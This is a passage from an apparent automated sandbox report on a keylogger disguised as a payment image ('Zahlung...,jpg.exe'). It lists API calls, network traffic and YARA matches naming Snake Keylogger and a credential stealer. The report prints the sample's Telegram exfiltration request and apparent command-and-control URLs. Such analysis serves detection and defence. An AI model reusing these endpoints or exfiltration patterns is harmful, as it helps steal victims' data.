Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00452126 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, |
0_2_0045C999 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_00436ADE |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00434BEE |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0045DD7C FindFirstFileW,FindClose, |
0_2_0045DD7C |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
0_2_0044BD29 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, |
0_2_00436D2D |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00442E1F |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
0_2_00475FE5 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0044BF8D |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20and%20Time:%2010/10/2024%20/%2013:51:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20284992%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:284992%0D%0ADate%20a |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000003021000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002FEB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002E7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: Zahlung_09102024,jpg.exe, 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002E7E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002E7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4497113676.0000000002EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: RegSvcs.exe, 00000002.00000002.4499585820.0000000003E51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: RegSvcs.exe, 00000002.00000002.4497113676.0000000003021000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: RegSvcs.exe, 00000002.00000002.4497113676.000000000301C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lBjq |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: Zahlung_09102024,jpg.exe PID: 4836, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: RegSvcs.exe PID: 6508, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00409A40 |
0_2_00409A40 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00412038 |
0_2_00412038 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00427161 |
0_2_00427161 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0047E1FA |
0_2_0047E1FA |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_004212BE |
0_2_004212BE |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00443390 |
0_2_00443390 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00443391 |
0_2_00443391 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0041A46B |
0_2_0041A46B |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0041240C |
0_2_0041240C |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00446566 |
0_2_00446566 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_004045E0 |
0_2_004045E0 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0041D750 |
0_2_0041D750 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_004037E0 |
0_2_004037E0 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00427859 |
0_2_00427859 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00412818 |
0_2_00412818 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0040F890 |
0_2_0040F890 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0042397B |
0_2_0042397B |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00411B63 |
0_2_00411B63 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0047CBF0 |
0_2_0047CBF0 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044EBBC |
0_2_0044EBBC |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00412C38 |
0_2_00412C38 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0044ED9A |
0_2_0044ED9A |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00423EBF |
0_2_00423EBF |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_00424F70 |
0_2_00424F70 |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_0041AF0D |
0_2_0041AF0D |
Source: C:\Users\user\Desktop\Zahlung_09102024,jpg.exe |
Code function: 0_2_03FE4E58 |
0_2_03FE4E58 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2D278 |
2_2_02C2D278 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C25362 |
2_2_02C25362 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2C146 |
2_2_02C2C146 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2C738 |
2_2_02C2C738 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2CA08 |
2_2_02C2CA08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2E988 |
2_2_02C2E988 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C269A0 |
2_2_02C269A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C26FC8 |
2_2_02C26FC8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2CFA9 |
2_2_02C2CFA9 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2CCD8 |
2_2_02C2CCD8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C29DE0 |
2_2_02C29DE0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2F631 |
2_2_02C2F631 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2FA88 |
2_2_02C2FA88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 2_2_02C2E97B |
2_2_02C2E97B |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.Zahlung_09102024,jpg.exe.2f20000.1.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 00000000.00000002.2072977464.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking |
Source: 00000002.00000002.4495471337.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: Zahlung_09102024,jpg.exe PID: 4836, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: Process Memory Space: RegSvcs.exe PID: 6508, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
